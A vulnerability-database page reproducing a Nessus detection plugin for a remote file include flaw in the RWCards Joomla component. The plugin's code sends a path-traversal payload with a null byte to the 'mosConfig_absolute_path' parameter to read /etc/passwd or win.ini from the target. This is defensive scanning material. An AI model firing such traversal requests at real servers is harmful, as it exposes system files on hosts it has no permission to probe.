Lucene search
K

RWCards Component for Joomla! 'mosConfig_absolute_path' Parameter Remote File Include

🗓️ 10 Dec 2012 00:00:00Reported by TenableType 
nessus
 nessus
🔗 www.tenable.com👁 54 Views

The RWCards Component for Joomla! mosConfig_absolute_path Parameter Remote File Include vulnerability allows remote attackers to disclose arbitrary files or execute arbitrary PHP code on the remote host

Refs
Code
SourceLink
nessuswww.nessus.org/u
weberrwww.weberr.de/
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(63201);
  script_version("1.12");
  script_set_attribute(attribute:"plugin_modification_date", value:"2026/04/22");

  script_name(english:"RWCards Component for Joomla! 'mosConfig_absolute_path' Parameter Remote File Include");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by a
remote file include vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of the RWCards component for Joomla! running on the remote
host is affected by a remote file include vulnerability due to
improper sanitization of user-supplied input to the
'mosConfig_absolute_path' parameter before using it in the
rwcards.advancedate.php script to include PHP code. An
unauthenticated, remote attacker can exploit this issue to disclose
arbitrary files or execute arbitrary PHP code on the remote host,
subject to the privileges of the web server user ID.");
  # https://packetstormsecurity.com/files/view/94688/joomlarwcards-rfi.txt
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?0edbe927");
  script_set_attribute(attribute:"see_also", value:"https://www.weberr.de/");
  script_set_attribute(attribute:"solution", value:
"Unknown at this time.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_attribute(attribute:"cvss_score_source", value:"manual");
  script_set_attribute(attribute:"cvss_score_rationale", value:"Tenable score for remote file inclusion.");

  script_set_attribute(attribute:"exploited_by_nessus", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2010/10/12");
  script_set_attribute(attribute:"plugin_publication_date", value:"2012/12/10");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:joomla:joomla\!");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:weberr:com_rwcards");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_set_attribute(attribute:"enable_cgi_scanning", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2012-2026 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("joomla_detect.nasl");
  script_require_keys("installed_sw/Joomla!", "www/PHP");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("http.inc");
include("webapp_func.inc");
include("url_func.inc");
include('report.inc');

app = "Joomla!";
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80, php:TRUE);

install = get_single_install(
  app_name : app,
  port     : port
);
dir = install['path'];
install_url =  build_url(port:port, qs:dir);

# Verify component is installed
plugin = "RWCards";

# Check KB first
installed = get_kb_item("www/"+port+"/webapp_ext/"+plugin+" under "+dir);

if (!installed)
{
  checks = make_array();
  regexes = make_list();
  regexes[0] = make_list('.rwcardsfull', '.rwcards');
  checks["/components/com_rwcards/css/rwcards.css"] = regexes;
  checks["/components/com_rwcards/css/rwcards.filloutform.css"] = regexes;

  # Ensure plugin is installed
  installed = check_webapp_ext(
    checks : checks,
    dir    : dir,
    port   : port,
    ext    : plugin
  );
}
if (!installed) audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + " component");

# Determine what to look for.
os = get_kb_item("Host/OS");
if (os && report_paranoia < 2)
{
  if ("Windows" >< os) files = make_list('windows/win.ini', 'winnt/win.ini');
  else files = make_list('etc/passwd');
}
else files = make_list('etc/passwd', 'windows/win.ini', 'winnt/win.ini');

file_pats = make_array();
file_pats['etc/passwd'] = "root:.*:0:[01]:";
file_pats['winnt/win.ini'] = "^\[[a-zA-Z]+\]|^; for 16-bit app support";
file_pats['windows/win.ini'] = "^\[[a-zA-Z]+\]|^; for 16-bit app support";

vuln = FALSE;
error = FALSE;
foreach file (files)
{
  attack =  mult_str(str:"../", nb:12) + file;
  url = "/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=" + urlencode(str:attack) + '%00';

  res = http_send_recv3(
    method       : "GET",
    item         : dir + url,
    port         : port,
    exit_on_fail : TRUE
  );

  if (egrep(pattern:file_pats[file], string:res[2]))
  {
     vuln = TRUE;
      contents = res[2];
      break;
  }
  # we get an error because magic_quotes was enabled
  else if (file + "\0/includes/version.php" >< res[2])
  {
    vuln = TRUE;
    error = TRUE;
    contents = strstr(res[2], file);
    break;
  }
  # we get an error claiming the file doesn't exist
  else if (
    "main(" +file+ "): failed to open stream: No such file" >< res[2] ||
    "include("+file+") [function.include]: failed to open stream: No such file" >< res[2]
  )
  {
    vuln = TRUE;
    error = TRUE;
    contents = strstr(res[2], file);
    break;
  }
  # we get an error about open_basedir restriction.
  else if ("open_basedir restriction in effect. File(" + file >< res[2])
  {
    vuln = TRUE;
    error = TRUE;
    contents = strstr(res[2], "open_basedir");
    break;
  }
}
if (vuln || error)
{
  var report_items = {
    'requests' : [install_url + url],
    'error'    : error,
    'file'     : file,
    'output'   : contents
  };

  report::build_and_report(port:port, severity:SECURITY_HOLE, report_items:report_items);
}
else
{
  audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Apr 2026 00:00Current
6.2Medium risk
Vulners AI Score6.2
54